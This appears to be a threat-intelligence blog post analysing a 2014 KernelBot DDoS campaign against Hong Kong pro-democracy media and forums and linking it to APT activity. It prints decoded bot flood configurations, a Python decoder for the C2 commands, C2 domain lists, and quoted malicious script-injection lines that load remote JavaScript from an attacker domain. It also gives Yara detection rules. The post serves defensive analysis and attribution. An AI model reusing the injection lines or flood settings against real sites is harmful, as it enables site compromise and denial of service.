<doc>
<section>
<heading>Operation Poisoned Handover: Unveiling Ties Between APT Activity
in Hong Kong’s Pro-Democracy Movement</heading>

As the pro-democracy movement in Hong Kong has continued, we’ve been watching for indications of
confrontation taking place in cyberspace. Protests began in September and have continued to escalate.

In recent weeks, attackers have launched a series of Distributed Denial of Service attacks (DDoS) against
websites promoting democracy in Hong Kong. According to the Wall Street Journal, websites belonging to
Next Media’s Apple Daily publication have suffered from an ongoing DDoS attack that “brought down its
email system for hours”. According to other reports, Next Media’s network has suffered a “total failure” as
a result of these attacks. Additionally, at least one member of the popular online forum HKGolden was
arrested for posting messages encouraging support for the OccupyCentral Pro Democracy movement.

The use of DDoS attacks as a political tool during times of conflict is not new; patriotic hacktivist groups
frequently use them as a means to stifle political activity of which they disapprove. The question of state
sponsorship (or at least tacit approval) in online crackdowns is often up for debate and ambiguous from a
technical evidence and tradecraft perspective.

In this case, however, we’ve discovered an overlap in the tools and infrastructure used by China-based
advanced persistent threat (APT) actors and the DDoS attack activity. We believe that these DDoS attacks
are linked to previously observed APT activity, including Operation Poisoned Hurricane. This correlation
sheds light on the potential relationships, symbiosis and tool sharing between patriotic hacker activities
designed to disrupt anti-government activists in China, and the APT activity we consistently see that is
more IP theft and espionage-focused.
</section>
<section>
<heading>Ongoing DDoS Attacks Target the Pro-Democracy Movement</heading>

FireEye has identified a number of binaries coded to receive instructions from a set of command and
control (C2) servers instructing participating bots to attack Next Media-owned websites and the
HKGolden forum. Next Media is a large media company in Hong Kong and the HkGolden forum has been
used as a platform to organize pro-democracy protests. Each sample we identified is signed with digital
certificates that have also been used by APT actors to sign binaries in previous intrusion operations:
<figure></figure>
These binaries are W32 Cabinet self-extracting files that drop a variant of an older DDoS tool known as
KernelBot . All of the samples we identified have the “NewVersion” value of 20140926. Structurally, all of
these samples are similar in that they drop three files:
<list>
•          ctfmon.exe-a legitimate, signed copy of the Pidgin IM client
           (md5 hash = 1685f978149d7ba8e039af9a4d5803c7)
•          libssp-0.dll–malware DLL which is side-loaded by ctfmon.exe
           to decode and launch KernelBot. Most versions of this dll are also
           signed by either the QTI or CallTogether certificate.
•          readme.txt – a binary file which contains the XOR-encoded
           KernelBot DLL as well as C2 destination information (most have
           md5 hash of b5ac964a74091d54e091e68cecd5b532)
</list>
The KernelBot implants receive targeting instructions from C2 servers hard-coded directly into the
sample. For example, c3d6450075d618b1edba17ee723eb3ca drops a KernelBot variant that connects to
both www.sapporo-digital-photoclub[.]com and wakayamasatei[.]com. The full list of C2 servers we
identified is as follows:
<list>
sapporo-digital-photoclub[.]com
wakayamasatei[.]com
tommo[.]jp
mizma.co[.]jp
sp.you-maga[.]com
nitori-tour[.]com
ninekobe[.]com
shinzenho[.]jp
wizapply[.]com
www.credo-biz[.]com
</list>
On Oct. 21, the control server at wakayamasatei[.]com responded with the following encoded
configuration file:
<list>
@$@cWFPWERPRnlPXl5DRE13JyBjWXhPWkVYXnleS15PFxonIGNZbkVdRGxDRk
94X0QaFxonIGlHTmNuGhcbJyBuRV1EbENGT3hfRH9YRhoXQl5eWhAFBRsaBBo
EGwQbHxsFGwRPUk8nIHF/Wk5LXk95T1hcT1h3JyBkT118T1hZQ0VEFxgaGx4
aExgcJyB/Wk5LXk9sQ0ZPf1hGF0JeXloQBQUbGgQaBBsEGx8bBRsET1JPJyBx
bm5leXViRVleeV5LXkNZXkNJWXcnIGlFX0Ref1hGFycgfkNHT1gXGCcgcW5uZ
Xl1eUlYQ1pebEZFRU53JyBjWXlJWENaXmxGRUVOFxsnIGlHTmNuFxsYGScgeU
lYQ1pebEZFRU5uZHkXJyB5SVhDWl5sRkVFTn9YRhdCXl5aEAUFRFJLWkMES1p
aRk9OS0NGUwRJRUcEQkEFJyB5SVhDWl5sRkVFTnpFWF4XEhonIGNZbU9ef1hG
bENGTxcbJyBjWXlPRE56S0lBT14XGicgfkJYT0tOZkVFWn5DR08XHycgfkJYT
0tOaUVfRF4XGxonIH5DR09YFxkcGicgY1l+Q0dPWBcbJyBxbm5leXV5SVhDWl
5sRkVFTnVrG3cnIGNZeUlYQ1pebEZFRU4XGicgaUdOY24XGycgeUlYQ1pebEZ
FRU5uZHkXGxoEGgQbBBsfGycgeUlYQ1pebEZFRU5/WEYXGxoEGgQbBBsfGwUb
BEJeR0YnIHlJWENaXmxGRUVOekVYXhcSGicgY1ltT15/WEZsQ0ZPFxsnIGNZe
U9ETnpLSUFPXhcbJyB+QlhPS05mRUVafkNHTxcbJyB+QlhPS05pRV9EXhcbJy
B+Q0dPWBcYGicgY1l+Q0dPWBcbJyBxbm5leXV/TlpsRkVFTncnIGNZf05abEZ
FRU4XGicgaUdOY24XGycgf05abEZFRU5uZHkXGxoEGgQbBBsfGycgfkJYT0tO
aUVfRF4XGycgfkNHT1gXGBonIGNZfkNHT1gXGycgcW5uZXl1f05abEZFRU51a
xt3JyBjWX9OWmxGRUVOFxonIGlHTmNuFxsnIH9OWmxGRUVObmR5FxsaBBoEGw
QbHxsnIH5CWE9LTmlFX0ReFxsnIH5DR09YFxgaJyBjWX5DR09YFxsnIHFubmV
5dXlTRGxGRUVOdycgY1l5U0RsRkVFThcaJyBpR05jbhcbJyB5U0RsRkVFTm5k
eRcbGgQaBBsEGx8bJyB5U0RsRkVFTnpFWF4XEhonIH5CWE9LTmlFX0ReFxsnI
H5DR09YFxgaJyBjWX5DR09YFxsnIHFubmV5dX5JWmxGRUVOdycgY1l+SVpsRk
VFThcaJyBpR05jbhcbJyB+SVpsRkVFTm5keRcbGgQaBBsEGx8bJyB+SVpsRkV
FTnpFWF4XEhonIGNZeU9ETnpLSUFPXhcbJyB+QlhPS05pRV9EXhcbJyB+Q0dP
WBcYGicgY1l+Q0dPWBcbJyBxbm5leXV+SVpsRkVFTnVrG3cnIGNZfklabEZFR
U4XGicgaUdOY24XGycgfklabEZFRU5uZHkXGxoEGgQbBBsfGycgfklabEZFRU
56RVheFxIaJyBjWXlPRE56S0lBT14XGycgfkJYT0tOaUVfRF4XHCcgfkNHT1g
XGBonIGNZfkNHT1gXGycg@$@
</list>
This configuration file can be decoded by stripping the leading and trailing @$@ characters. At this point,
a simple base64 and XOR decode will reveal the plaintext configuration. The following snippet of python
code can be used to decode this command:
<code>
b64encoded = request.content.rstrip('@$@').lstrip('@$@')
b64decoded = b64encoded.decode("base64")


command = ""


for c in b64decoded:
           x = ord(c)
           x = x ^ XOR_key
           command += chr(x)
</code>
FireEye has observed two different single-byte XOR keys used to encode configuration files issued by the
DDOS C2 servers in this campaign. The two different keys are 0x2A or 0x7E. The encoded configuration
file shown above decodes to:
<list>
[KernelSetting]
IsReportState=0
IsDownFileRun0=0
CmdID0=1
DownFileRunUrl0=http://10.0.1.151/1.exe
[UpdateServer]
NewVersion=20140926
UpdateFileUrl=http://10.0.1.151/1.exe
[DDOS_HostStatistics]
CountUrl=
Timer=2
[DDOS_ScriptFlood]
IsScriptFlood=1
CmdID=123
ScriptFloodDNS=
ScriptFloodUrl=http://nxapi.appledaily.com.hk/
ScriptFloodPort=80
IsGetUrlFile=1
IsSendPacket=0
ThreadLoopTime=5
ThreadCount=10
Timer=360
IsTimer=1
[DDOS_ScriptFlood_A1]
IsScriptFlood=0
CmdID=1
ScriptFloodDNS=10.0.1.151
ScriptFloodUrl=10.0.1.151/1.html
ScriptFloodPort=80
IsGetUrlFile=1
IsSendPacket=1
ThreadLoopTime=1
ThreadCount=1
Timer=20
IsTimer=1
[DDOS_UdpFlood]
IsUdpFlood=0
CmdID=1
UdpFloodDNS=10.0.1.151
ThreadCount=1
Timer=20
IsTimer=1
[DDOS_UdpFlood_A1]
IsUdpFlood=0
CmdID=1
UdpFloodDNS=10.0.1.151
ThreadCount=1
Timer=20
IsTimer=1
[DDOS_SynFlood]
IsSynFlood=0
CmdID=1
SynFloodDNS=10.0.1.151
SynFloodPort=80
ThreadCount=1
Timer=20
IsTimer=1
[DDOS_TcpFlood]
IsTcpFlood=0
CmdID=1
TcpFloodDNS=10.0.1.151
TcpFloodPort=80
IsSendPacket=1
ThreadCount=1
Timer=20
IsTimer=1
[DDOS_TcpFlood_A1]
IsTcpFlood=0
CmdID=1
TcpFloodDNS=10.0.1.151
TcpFloodPort=80
IsSendPacket=1
ThreadCount=6
Timer=20
IsTimer=1
</list>
During the course of our research, we’ve observed more than 30 different unique configuration files issued
by the C2 servers listed above. These configurations issued commands to attack the following domains and
IPs:
<list>
nxapi.appledaily.com[.]hk
202.85.162.90
58.64.139.10
202.85.162.97
202.85.162.81
198.41.222.6
202.85.162.101
202.85.162.95
202.85.162.180
202.85.162.140
202.85.162.130
124.217.214.149
</list>
All of the above IPs host Next Media or Apple daily websites, with the exception of 58.64.139.10 and
124.217.214.149. The IP 58.64.139.10 has hosted hkgolden[.]com – the domain for the HKGolden forum
mentioned above.

For approximately 14 hours between October 23rd and 24th, the attackers pushed a configuration update
to four controls servers that instructed bots under their control to flood 124.217.214.149 with UDP traffic.
The IP 124.217.214.149 hosted the attacker controlled domain p.java-sec[.]com.

On Oct. 23, 2014, two of the active controls began instructing participating bots to cease attacks. By Oct.
24, 2014, all five of the known active control servers were issuing commands to cease the attacks.

It should come as no surprise that hkgolden[.]com, nextmedia[.]com, and appledaily.com[.]hk websites
are now or previously have been blocked by the Great Firewall of China – indicating that the PRC has
found the content hosted on these sites objectionable.

</section>

<section>
<heading>Links to Previous Activity</heading>

The most direct connection between these DDoS attacks and previous APT activity is the use of the QTI
International and CallTogether code signing certificates, which we have seen in malware attributed to APT
activity.

The QTI International digital certificate has been previously used to sign binaries used in APT activity
including Operation Poisoned Hurricane. Specifically, 17bc9d2a640da75db6cbb66e5898feb1 is a PlugX
variant signed by the QTI International certificate. This PlugX variant connected to a Google Code project
at code.google[.]com/p/udom/, where it decoded a command that configured its C2 server.

The sample 0b54ae49fd5a841970b98a078968cb6b was signed with the QTI International certificate as
well. This sample was first observed during a drive-by attack in June 2014, and was downloaded from
java-se[.]com/jp.jpg. This sample is detected as Backdoor.APT.Preshin and connected to luxscena[.]com
for C2.

The QTI International certificate was also used to sign e2a4b96cce9de4fb126cfd5f5c73c3ed. We detect
this payload as Backdoor.APT.PISCES and it used hk.java-se[.]com for C2. The java-se[.]com website was
previously used in other attacks targeting the pro-democracy movement in Hong Kong. We first observed
the presence of malicious javascript inserted into Hong Kong Association for Democracy and People’s
Livelihood on June 26, 2014, which appeared as the following:
<list>
<a href="http://www.adpl.org.hk/?p=2680" title="抗議九巴加價要求凍結加價、改善服務
<script language=javascript src=http://java-se.com/o.js></script>">
</list>


More recently, as noted by Claudio Guarnieri, the website of the Democratic Party of Hong Kong was
seen hosting a redirect to the same malicious javascript.
The CallTogether certificate has been used to sign ecf21054ab515946a812d1aa5c408ca5. We also detect
this payload as Backdoor.APT.PISCES and observed it connect to u.java-se[.]com.
Both of these certificates are valid but can be detected and blocked via the following Yara signatures:
<code>
rule callTogether_certificate
{
    meta:
      author = "Fireeye Labs"
      version = "1.0"
      reference_hash = "d08e038d318b94764d199d7a85047637"
      description = “detects binaries signed with the CallTogether certificate”
    strings:
      $serial = {452156C3B3FB0176365BDB5B7715BC4C}
      $o = "CallTogether, Inc."
    condition:
      $serial and $o
}


rule qti_certificate
{
      meta:
           author = "Fireeye Labs"
           reference_hash = "cfa3e3471430a0096a4e7ea2e3da6195"
           description = "detects binaries signed with the QTI International Inc
certificate"
      strings:
           $cn = "QTI International Inc"
           $serial = { 2e df b9 fd cf a0 0c cb 5a b0 09 ee 3a db 97 b9 }
      condition:
           $cn and $serial
}
</code>
These ongoing DDoS attacks and previous APT intrusion activity both target the hkgolden[.]com website.
As noted above, this site has been targeted with a DDoS attack by a KernelBot network. We also found that
the hkgolden[.]com website was compromised on Sept. 5, 2014 and had a redirect to a malicious javascript
again hosted at another jave-se[.]com host, which appeared as follows:
<code>
document.write("<script language=javascript src=http://jre76.java-
se.com/js/rss.js></script>
</code>
Finally, as noted above the IP 124.217.214.149 was seen hosting the domain p.java-sec[.]com between Oct.
25, 2014 and Oct. 27, 2014. As Brandon Dixon noted here, the java-sec[.]com domain is linked to the java-
se[.]com by shared hosting history at the following IP address:
<list>
124.248.237.26
223.29.248.9
211.233.89.182
112.175.143.2
112.175.143.9
</list>
It is unclear why these actors would attack an IP address they were actively using. It’s possible that the
attackers wanted to test their botnet’s capability by attacking an IP they were using to gather statistics on
the size of the attack. It is also possible that the attackers simply made a mistake and accidentally issued
commands to attack their own infrastructure. On Oct. 24, 2014, after attacking their own infrastructure,
the attackers issued new instructions to their botnet that ceased all attacks.
</section>
<section>
<heading>Conclusion</heading>

While not conclusive, the evidence presented above shows a link between confirmed APT
activity and ongoing DDoS attacks that appear to be designed to silence the Pro Democracy
movement in Hong Kong. The evidence does not conclusively prove that the same actors responsible
for the DDoS attacks are also behind the observed intrusion activity discussed above – such as Operation
Poisoned Hurricane. Rather, the evidence may indicate that a common quartermaster supports
both the DDoS attacks and ongoing intrusion activity.

In either scenario, there is a clear connection between the intrusion activity documented in Operation
Poisoned Hurricane and the DDOS attacks documented here. While the tactics of these activities are very
different from a technical perspective, each supports distinct political objectives. Operation Poisoned
Hurricane’s objective appeared to have in part been IP theft possibly for economic gain or other
competitive advantages. In the DDOS attacks, the objective was to silence free speech and suppress the
pro democracy movement in Hong Kong. The Chinese government is the entity most likely to be
interested in achieving both of these objectives.
</section>
<section>
<heading>APPENDIX</heading>
</section>
<section>
<heading>MD5s</heading>
<list>
c3d6450075d618b1edba17ee723eb3ca
d08e038d318b94764d199d7a85047637
84bd0809b1dbc2dc86f30d30faaa7e4e
39bb90140fc0101f49377b6c60076f9d
caa5529010c17b969da01ade084794c6
17bc9d2a640da75db6cbb66e5898feb1
0b54ae49fd5a841970b98a078968cb6b
e2a4b96cce9de4fb126cfd5f5c73c3ed
ecf21054ab515946a812d1aa5c408ca5
</list>
</section>
<section>
<heading>HOSTNAMES</heading>
<list>
tommo[.]jp
mizma.co[.]jp
sp.you-maga[.]com
nitori-tour[.]com
ninekobe[.]com
shinzenho[.]jp
wizapply[.]com
www.credo-biz[.]com
www.sapporo-digital-photoclub[.]com
wakayamasatei[.]com
luxscena[.]com
java-se[.]com
hk.java-se[.]com
u.java-se[.]com
jre76.java-se[.]com
p.java-sec[.]com
</list>
</section>
<section>
This entry was posted in Threat Intelligence, Threat Research and tagged advanced malware,
Cybersecurity, malware, zero-day by Ned Moran, Mike Oppenheim and Mike Scott. Bookmark the
permalink.
</section>

</doc>